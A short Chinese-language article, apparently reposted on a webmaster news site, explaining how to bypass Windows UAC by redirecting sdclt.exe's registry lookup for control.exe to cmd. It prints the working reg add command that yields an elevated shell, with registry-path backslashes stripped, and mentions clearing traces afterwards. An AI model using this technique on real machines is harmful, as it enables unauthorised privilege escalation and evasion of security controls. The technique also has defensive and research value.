如何使用sdclt磁盘备份工具绕过UAC
发布时间:2022-05-18 09:58:02 所属栏目:安全 来源:互联网
导读:sdclt 是微软提供的命令行磁盘备份工具,从 Vista 时代引入 控制面板的主程序为 control.exe,那么 sdclt 是如何找到 control.exe 完整路径的呢? 通过 process monitor 的分析 (过滤掉不相干进程,再用 CTRL + F 搜索 control.exe),sdclt 似乎是从注册表读
sdclt 是微软提供的命令行磁盘备份工具,从 Vista 时代引入 控制面板的主程序为 control.exe,那么 sdclt 是如何找到 control.exe 完整路径的呢? 通过 process monitor 的分析 (过滤掉不相干进程,再用 CTRL + F 搜索 control.exe),sdclt 似乎是从注册表读取到了 control.exe 的路径, 复制 reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionApp Pathscontrol.exe" /t REG_SZ /d %COMSPEC% /f sdclt 可以看到,控制面板没有启动,而是弹出了一个 cmd,我们也获得了管理员权限 当然,提升权限后还要清理下痕迹,具体代码请看完整PoC。 (编辑:应用网_丽江站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐
热点阅读